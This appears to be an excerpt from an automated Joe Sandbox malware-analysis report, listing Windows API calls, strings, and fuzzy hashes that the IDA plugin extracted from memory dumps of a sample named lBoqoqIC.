                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value
                                                                                                                • String ID: %02u/%02u/%02u %02u:%02u
                                                                                                                • API String ID: 3702945584-3598649713
                                                                                                                • Opcode ID: d4e109c05d319f4413824bca8a8b348024662cad34a39dcea20a531305c0660d
                                                                                                                • Instruction ID: ebbe4f52e660b47e4a3f7d3e3b5692c1a7f65e9970843013d5417d375fc9d7a0
                                                                                                                • Opcode Fuzzy Hash: d4e109c05d319f4413824bca8a8b348024662cad34a39dcea20a531305c0660d
                                                                                                                • Instruction Fuzzy Hash: AFB1D9B26007055BE720DF25E881BA7B7E4EF95314F04493FE95E87346DA39B408CB6A
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00448402
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0044840B
                                                                                                                  • Part of subcall function 004CCC43: ScreenToClient.USER32(?,?), ref: 004CCC57
                                                                                                                  • Part of subcall function 004CCC43: ScreenToClient.USER32(?,?), ref: 004CCC60
                                                                                                                  • Part of subcall function 004C9502: MoveWindow.USER32(?,?,00000001,?,?,?,?,0040A7C9,?,?,?,?,00000001,?,00000000), ref: 004C951E
                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,00000001,?), ref: 00448465
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00448494
                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 004484E7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientRedrawScreen$MoveShow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3454447493-0
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004203EE
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00420415
                                                                                                                • __ftol.LIBCMT ref: 00420424
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 00451AED: SendMessageA.USER32(?,0000014A,000000FF,?), ref: 00451B1A
                                                                                                                • IsWindow.USER32(?), ref: 00420497
                                                                                                                • InvalidateRect.USER32(?,-00000018,00000001,?,00000004,00000000,00000000,00000000), ref: 004204B8
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftol$IncrementInterlockedInvalidateMessageRectSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 4170118472-0
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004209EB
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00420A11
                                                                                                                • __ftol.LIBCMT ref: 00420A23
                                                                                                                • IsWindow.USER32(?), ref: 00420A62
                                                                                                                • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00420A7B
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog__ftol$MessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 414663571-0
                                                                                                                APIs
                                                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 004D0A13
                                                                                                                • GlobalAddAtomA.KERNEL32(?), ref: 004D0A22
                                                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 004D0A38
                                                                                                                • GlobalAddAtomA.KERNEL32(?), ref: 004D0A41
                                                                                                                • SendMessageA.USER32(?,000003E4,?,?), ref: 004D0A65
                                                                                                                Similarity
                                                                                                                • API ID: AtomGlobal$Name$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1515195355-0
                                                                                                                APIs
                                                                                                                • TlsFree.KERNEL32(00000000,?,?,004D49C7,00000000,00000001), ref: 004D44C6
                                                                                                                • GlobalHandle.KERNEL32(006DB280), ref: 004D44EE
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004D44F7
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004D44FE
                                                                                                                • RtlDeleteCriticalSection.NTDLL(005265A4), ref: 004D4508
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$CriticalDeleteHandleSectionUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2159622880-0
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0043432C
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                • __ftol.LIBCMT ref: 004343CF
                                                                                                                • Sleep.KERNEL32(000003E8,?,?,00523A30,00000000), ref: 00434582
                                                                                                                  • Part of subcall function 00405829: __EH_prolog.LIBCMT ref: 0040582E
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DecrementInterlockedSleep__ftollstrlen
                                                                                                                • String ID: M
                                                                                                                • API String ID: 2235712041-2059362058
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0043853C
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0041ED1A: __EH_prolog.LIBCMT ref: 0041ED1F
                                                                                                                • __ftol.LIBCMT ref: 00438677
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftollstrlen
                                                                                                                • String ID: find$string
                                                                                                                • API String ID: 2052632373-714750175
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00438104
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                • __ftol.LIBCMT ref: 00438141
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftol
                                                                                                                • String ID: string$sub
                                                                                                                • API String ID: 386204849-840957247
                                                                                                                • Opcode ID: 6abd88f371b5804018c6640d17cc2162726079331c79b9a5e5c6cd8d70bb7097
                                                                                                                • Instruction ID: 0a84d31eb87c2cf0dfbeca07404b8c80f64030a6b5c9cdc93c6df70cd9cab058
                                                                                                                • Opcode Fuzzy Hash: 6abd88f371b5804018c6640d17cc2162726079331c79b9a5e5c6cd8d70bb7097
                                                                                                                • Instruction Fuzzy Hash: 9C41263190591076CB05BB66DC06FDF76289F86368F24061FF011661D2DF7C174283AE
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004307F1
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                • __ftol.LIBCMT ref: 00430844
                                                                                                                • GetProcAddress.KERNEL32(00000000,MsiApplyPatchA), ref: 0043089B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$AddressProc__ftollstrlen
                                                                                                                • String ID: MsiApplyPatchA
                                                                                                                • API String ID: 1060375874-3494550721
                                                                                                                • Opcode ID: 430ddd6f83711d950128309da4ab1ff88125b4d333911fcf85fc06e9a8566a08
                                                                                                                • Instruction ID: 3650b06de49e0371e24a52ee1b310ea6181d079255d05b88511ed11ebd425911
                                                                                                                • Opcode Fuzzy Hash: 430ddd6f83711d950128309da4ab1ff88125b4d333911fcf85fc06e9a8566a08
                                                                                                                • Instruction Fuzzy Hash: 3B31F436914214B9EB08F362EC16FDF27289F41328F14011FF501A61C2EF7C5B8182AD
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004281A3
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                • __ftol.LIBCMT ref: 00428226
                                                                                                                • ShellExecuteA.SHELL32(00000000,explore,00000000,00000002,00000000,00523A30), ref: 0042826C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$DecrementExecuteIncrementShell__ftol
                                                                                                                • String ID: explore
                                                                                                                • API String ID: 3873431966-1223399770
                                                                                                                • Opcode ID: bd00ea477b01b95d683aa43f1a2f224e03f1d6069c242f1992e59e042619e2af
                                                                                                                • Instruction ID: abe5bc0a56f320496d7d89a062e45ca6eec03fae51079ef31fbbbf9bac991e33
                                                                                                                • Opcode Fuzzy Hash: bd00ea477b01b95d683aa43f1a2f224e03f1d6069c242f1992e59e042619e2af
                                                                                                                • Instruction Fuzzy Hash: 7E31A376905618BEDB04EBB6D846EEF7B68DF45314F10002FF401A2182EF786B858679
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0044090A
                                                                                                                  • Part of subcall function 004194C8: __EH_prolog.LIBCMT ref: 004194CD
                                                                                                                  • Part of subcall function 004194C8: LoadLibraryExA.KERNEL32(WinINet.dll,00000000,00000002,00523A30), ref: 00419513
                                                                                                                  • Part of subcall function 004194C8: FormatMessageA.KERNEL32(00001300,00000000,00002EE0,00000400,?,00000000,00000000,00523A30), ref: 00419538
                                                                                                                  • Part of subcall function 004194C8: LocalFree.KERNEL32(?,?), ref: 00419550
                                                                                                                  • Part of subcall function 004194C8: FreeLibrary.KERNEL32(00000000), ref: 0041955B
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 00417FD8: __EH_prolog.LIBCMT ref: 00417FDD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$FreeLibrary$DecrementFormatInterlockedLoadLocalMessage
                                                                                                                • String ID: Message$Number$Status
                                                                                                                • API String ID: 1938834182-3482011399
                                                                                                                • Opcode ID: 8811a978a070b76f05fee87e4f21c6044bbcea7103bf46db11927d13232daa9b
                                                                                                                • Instruction ID: 9a994f7739760833678aee26aba1a019c7c7f41c86935ee0ce91a999a74bc4b2
                                                                                                                • Opcode Fuzzy Hash: 8811a978a070b76f05fee87e4f21c6044bbcea7103bf46db11927d13232daa9b
                                                                                                                • Instruction Fuzzy Hash: F521B031805528BACB01BBA6CC02FDE3A68AF52328F10059FF415714D2DF7C178687AE
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 0042493C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog__ftol
                                                                                                                • String ID: Enabled$Text$Visible
                                                                                                                • API String ID: 2123048387-1258828939
                                                                                                                • Opcode ID: d67fd1ab2e22001e29231bb87058fa1e38bd03c7f8eccca9ce09a03a130009bf
                                                                                                                • Instruction ID: 7195619b2e3654ba354e6922707d6a0a44ada4efaa78e5adbad629ea1bfedfff
                                                                                                                • Opcode Fuzzy Hash: d67fd1ab2e22001e29231bb87058fa1e38bd03c7f8eccca9ce09a03a130009bf
                                                                                                                • Instruction Fuzzy Hash: F411E33610692576DA0237A69C03FDF260D9F463A8F14050FF915290E2AF6D639383EE
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004145C2
                                                                                                                • FormatMessageA.KERNEL32(00001300,00000000,000000FF,00000400,?,00000000,00000000,00523A30,?,?,00000000), ref: 004145FB
                                                                                                                • LocalFree.KERNEL32(?,?), ref: 00414625
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: FormatFreeH_prologLocalMessage
                                                                                                                • String ID: Unknown error.
                                                                                                                • API String ID: 1380236612-4225751778
                                                                                                                • Opcode ID: 02109e0bec9d850b2004846ae79263ef8337b5883cdba9afc6f5bc6e6f64563a
                                                                                                                • Instruction ID: b2f9e91ba35779c885f8761fedbd08b48a8e4367c680402b3f28deb291a5c119
                                                                                                                • Opcode Fuzzy Hash: 02109e0bec9d850b2004846ae79263ef8337b5883cdba9afc6f5bc6e6f64563a
                                                                                                                • Instruction Fuzzy Hash: 7911827590025AAEDB04EF95DC81EEEBB38FF50759F10402EF502B6191CB785E44CB64
                                                                                                                APIs
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0040C412
                                                                                                                • TranslateMessage.USER32(?), ref: 0040C442
                                                                                                                • DispatchMessageA.USER32(?), ref: 0040C44C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchPeekTranslate
                                                                                                                • String ID:
                                                                                                                • API String ID: 4217535847-3916222277
                                                                                                                • Opcode ID: a921475d4ef06622d89896c9309cf0f9ca651fab3d7c08b897c7fe13daa55a8c
                                                                                                                • Instruction ID: 221f7586b05350e79d6d81648bcd6839419b0a175b5281decc0391173994cc07
                                                                                                                • Opcode Fuzzy Hash: a921475d4ef06622d89896c9309cf0f9ca651fab3d7c08b897c7fe13daa55a8c
                                                                                                                • Instruction Fuzzy Hash: 7E11F8B1A0130DDBEF24CFD0D989BDEBBB9BB40708F108129E541BA2C5D7B994498B54
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,004AF659), ref: 004B8588
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004B8598
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                • API String ID: 1646373207-3105848591
                                                                                                                • Opcode ID: 6a2cfa6aeef1491d55ec309768ecfe3db66066cf24621627ca0a40ef32a6fdd5
                                                                                                                • Instruction ID: a57e73e2bb75307bdcd2e85eb56f4008d7d981af8501584ad9a2421c441afd51
                                                                                                                • Opcode Fuzzy Hash: 6a2cfa6aeef1491d55ec309768ecfe3db66066cf24621627ca0a40ef32a6fdd5
                                                                                                                • Instruction Fuzzy Hash: 82C08CA0382382FADAB02BB29C89B7E220C1B40B83F24007AB599D81D1CE7CC501C03D
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                                                  • Part of subcall function 004C9476: SetWindowTextA.USER32(00000000,00000001), ref: 004C9484
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0044823F
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00448248
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 00447B48: __EH_prolog.LIBCMT ref: 00447B4D
                                                                                                                  • Part of subcall function 00447B48: GetDC.USER32(?), ref: 00447B90
                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,00000001,?,?,?,?,00000000), ref: 00448309
                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00448340
                                                                                                                Similarity
                                                                                                                • API ID: Window$RectRedraw$H_prologIncrementInterlockedShowText
                                                                                                                • String ID:
                                                                                                                • API String ID: 878543187-0
                                                                                                                • Opcode ID: 65fe9e1940129650144afb7f3abf200f655a85f99cf88ee5470afe1b125bb1f5
                                                                                                                • Instruction ID: bdf574744a0fd40e12146c129acc06e2f339a664087c471db0752594b5c75de0
                                                                                                                • Opcode Fuzzy Hash: 65fe9e1940129650144afb7f3abf200f655a85f99cf88ee5470afe1b125bb1f5
                                                                                                                • Instruction Fuzzy Hash: AE415F75E00119AFDF05DFA8CD85EEEBBB5FB48304F10416AE901B7285DA75AE01CB94
                                                                                                                APIs
                                                                                                                • InternetCanonicalizeUrlA.WININET(00000825,?,00000825,?), ref: 0041C9C4
                                                                                                                • GetLastError.KERNEL32(?,00000825,?), ref: 0041C9CA
                                                                                                                • InternetCanonicalizeUrlA.WININET(00000825,00000000,00000824,?), ref: 0041C9F0
                                                                                                                • InternetCrackUrlA.WININET(?,00000000,?,?), ref: 0041CA16
                                                                                                                Similarity
                                                                                                                • API ID: Internet$Canonicalize$CrackErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2691905175-0
                                                                                                                • Opcode ID: 2252c0795c9837b5ead2f32c7931c4325569a2d7cc3db887cb4dc46805a76772
                                                                                                                • Instruction ID: 4d26e904cd6159e36f6c02495d3d9e6b7e103ed7a3b0d0be63ba7845e993edb0
                                                                                                                • Opcode Fuzzy Hash: 2252c0795c9837b5ead2f32c7931c4325569a2d7cc3db887cb4dc46805a76772
                                                                                                                • Instruction Fuzzy Hash: 664133B955024E9BDB12CF54CC80BEB3BA5FF08394F114056E8169B340DA78DDC1CBA9
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00474504
                                                                                                                • GetFileAttributesA.KERNEL32(?,?,?,?,?,004741D2), ref: 004745D5
                                                                                                                • ExtractIconA.SHELL32(?,?,00000000), ref: 004745ED
                                                                                                                • LoadIconA.USER32(?,00000073), ref: 0047460D
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0047FCF1: __EH_prolog.LIBCMT ref: 0047FCF6
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004B0B55: GetFileAttributesA.KERNEL32(-R,004BD3B6,?,00000000,00000000,00522DE4,?,?,?,004EF72C,00000000), ref: 004B0B59
                                                                                                                  • Part of subcall function 004B0B55: GetLastError.KERNEL32(?,?,?,004EF72C,00000000), ref: 004B0B64
                                                                                                                  • Part of subcall function 004C61B3: __EH_prolog.LIBCMT ref: 004C61B8
                                                                                                                Similarity
                                                                                                                • API ID: H_prologInterlocked$AttributesFileIconIncrement$DecrementErrorExtractLastLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 3135826775-0
                                                                                                                • Opcode ID: 274e1c65db4f00c34f450ac420b781d89e7568184dca888dcb94617926bbfd24
                                                                                                                • Instruction ID: d271e0370d57781416bfa7f4525115f2f2ec44ec13527acb039fee82c2046f9e
                                                                                                                • Opcode Fuzzy Hash: 274e1c65db4f00c34f450ac420b781d89e7568184dca888dcb94617926bbfd24
                                                                                                                • Instruction Fuzzy Hash: 4F31B5B5900604EFCB04EBA5C985EEEB7B8EF14314F10452EF115E3292DB78AA45CB25
                                                                                                                APIs
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLeadNextlstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3156859252-0
                                                                                                                • Opcode ID: 3d05fac422c7f87978d373ae1d01b163e2ebd2fe072d91c2801b887ffab2e391
                                                                                                                • Instruction ID: 0e3a410be327782064ec7343a9c9ba60b0fc100549801cd034d74be241764fb9
                                                                                                                • Opcode Fuzzy Hash: 3d05fac422c7f87978d373ae1d01b163e2ebd2fe072d91c2801b887ffab2e391
                                                                                                                • Instruction Fuzzy Hash: C631D7352093C68ADB215F259C807ABBFA4AFF3358F1804AFD8C547352D76A4859C72B
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004204F9
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 0042051F
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 00451A7B: __EH_prolog.LIBCMT ref: 00451A80
                                                                                                                  • Part of subcall function 00451A7B: SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00451AB9
                                                                                                                • IsWindow.USER32(?), ref: 00420591
                                                                                                                • InvalidateRect.USER32(?,-00000018,00000001,?,00000004,00000000,00000000,00000000), ref: 004205B2
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$IncrementInterlockedInvalidateMessageRectSendWindow__ftol
                                                                                                                • String ID:
                                                                                                                • API String ID: 1247432796-0
                                                                                                                • Opcode ID: cc0242938db8105b1e477237c33f45f822a11cea8a53f8c4ee3902ffa2938656
                                                                                                                • Instruction ID: 7cdaacfbf1fe49471af1143fd13cbce80a140e36cf0db1da9221879e06584097
                                                                                                                • Opcode Fuzzy Hash: cc0242938db8105b1e477237c33f45f822a11cea8a53f8c4ee3902ffa2938656
                                                                                                                • Instruction Fuzzy Hash: 25210471A00214BBCB10EF65CC46FEE77B8EF51754F00011EF801AB2D2DB78AA408BA9
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00408309
                                                                                                                • FrameRect.USER32(?,?,?), ref: 00408349
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00408356
                                                                                                                • FillRect.USER32(?,?,?), ref: 004083AD
                                                                                                                Similarity
                                                                                                                • API ID: Rect$FillFrameH_prologInflate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3463447664-0
                                                                                                                • Opcode ID: 47edea8aca5030da6886c6308ab0ac52598dc96c11210481f2b85d342283b7d5
                                                                                                                • Instruction ID: 006d8efee22706b5c6f664660fe7ec29989481165e9f17d750b5c126db11eac0
                                                                                                                • Opcode Fuzzy Hash: 47edea8aca5030da6886c6308ab0ac52598dc96c11210481f2b85d342283b7d5
                                                                                                                • Instruction Fuzzy Hash: 61215176800609DFCF10DFA5C9819EEB7B4FB54714F14863FE9A2A3690CB399A04CB55
                                                                                                                APIs
                                                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 004D47E3
                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 004D47F3
                                                                                                                • LocalFree.KERNEL32(?), ref: 004D47FC
                                                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 004D4812
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2949335588-0
                                                                                                                • Opcode ID: 8efcdd7e3007ca8772ce6586c4dd66bd839b91818b7799a4fdd3ec79fb46cc36
                                                                                                                • Instruction ID: 8cf4eee74af497b272b1893a1d16c683aa14186811526e24e1cb218f27e42cd6
                                                                                                                • Opcode Fuzzy Hash: 8efcdd7e3007ca8772ce6586c4dd66bd839b91818b7799a4fdd3ec79fb46cc36
                                                                                                                • Instruction Fuzzy Hash: ED215635200200EFD7249F88D895BAA77E4FF86755F10806FE9428B3A2C7B9E841CB58
                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 004807B6
                                                                                                                • WindowFromPoint.USER32(?,?), ref: 004807C2
                                                                                                                • GetActiveWindow.USER32 ref: 004807E5
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00480817
                                                                                                                  • Part of subcall function 00407729: InvalidateRect.USER32(?,00000000,00000001,004077EE,00000000), ref: 0040773E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRectWindow$ActiveClientFromPointScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2221759807-0
                                                                                                                • Opcode ID: bbabf0232d68cd9f1ec0b5716627c09649f0bf2f01ad0bd1af4c4b7e8f4b19c3
